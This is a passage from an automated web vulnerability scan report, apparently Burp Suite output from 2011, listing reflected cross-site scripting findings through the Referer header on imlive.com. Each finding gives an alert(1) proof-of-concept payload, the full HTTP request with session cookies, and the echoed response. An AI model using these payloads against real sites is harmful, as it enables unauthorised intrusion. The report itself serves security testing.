Referer: http://www.google.com/search?hl=en&q=9ec55'-alert(1)-'3deb7da7e95
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb266870=5_[r^208WMuF4Lw)IE.8qu]==?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPyqFBR3BpJpcBWHfHSmrEEKwRUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEsAQBAgUCAAIAAAAAHyH9zwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254384%29%3Buf%28%27r%27%2C+151403%2C+1296254384%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2811%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2887%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28619%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28620%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28621%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

4.934. http://imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adbd'-alert(1)-'4f9aafda70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=8adbd'-alert(1)-'4f9aafda70b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0W5s89nS82L1Y30bT54fyWa09YbZxWHM4PkcHt5cVPiM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:46 GMT
Connection: close
Content-Length: 19013
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/homepage.aspx&he=imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8adbd'-alert(1)-'4f9aafda70b&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.935. http://imlive.com/GuestDiscountClubs.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/GuestDiscountClubs.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c53c'-alert(1)-'71f23548084 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /GuestDiscountClubs.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=3c53c'-alert(1)-'71f23548084

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:00 GMT
Connection: close
Content-Length: 40625
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=3c53c'-alert(1)-'71f23548084&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.936. http://imlive.com/SiteInformation.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/SiteInformation.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a8e5'><script>alert(1)</script>0a7d7dac8a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /SiteInformation.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=7a8e5'><script>alert(1)</script>0a7d7dac8a3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:46 GMT
Connection: close
Content-Length: 28320
Vary: Accept-Encoding

<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/terminology/&lr=1107816009&ud=0&pe=siteinformation.asp&rf=http://www.google.com/search?hl=en^q=7a8e5'><script>alert(1)</script>0a7d7dac8a3&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.937. http://imlive.com/awardarena/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/awardarena/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fbb'-alert(1)-'f6926b45b35 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /awardarena/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=46fbb'-alert(1)-'f6926b45b35

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 24721
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/&rf=http://www.google.com/search?hl=en^q=46fbb'-alert(1)-'f6926b45b35&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.938. http://imlive.com/become_celeb.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/become_celeb.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f517a'><script>alert(1)</script>7528764405c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /become_celeb.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f517a'><script>alert(1)</script>7528764405c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSx9rb%2Be3%2BOTRTIW6m11TETaF6QXi%2ByFiLHg95wp%2FGOR9lSwrZUtExpRjmx1VFU8tmLVZ5WOhWeG2PPzltaaotqhw%3D%3D; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 13435
Vary: Accept-Encoding

<html>
<head>
<title>Celebrity Porn Star Sign Up at ImLive</title>
<meta name="description" content="Already a Celebrity Porn star? Access millions of ImLive members through celebrity Porn Star L
...[SNIP]...
img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/pornstars-sign-up/&lr=1107816008&ud=0&pe=become_celeb.asp&rf=http://www.google.com/search?hl=en^q=f517a'><script>alert(1)</script>7528764405c&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.939. http://imlive.com/become_host.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/become_host.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6689'-alert(1)-'b778a8b9f7a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /become_host.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f6689'-alert(1)-'b778a8b9f7a

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:31 GMT
Connection: close
Content-Length: 21060
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx&rf=http://www.google.com/search?hl=en^q=f6689'-alert(1)-'b778a8b9f7a&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.940. http://imlive.com/becomehost.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/becomehost.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98226'-alert(1)-'ff8df7e9357 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /becomehost.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=98226'-alert(1)-'ff8df7e9357

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:01 GMT
Connection: close
Content-Length: 21060
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx&rf=http://www.google.com/search?hl=en^q=98226'-alert(1)-'ff8df7e9357&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.941. http://imlive.com/categoryfs.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
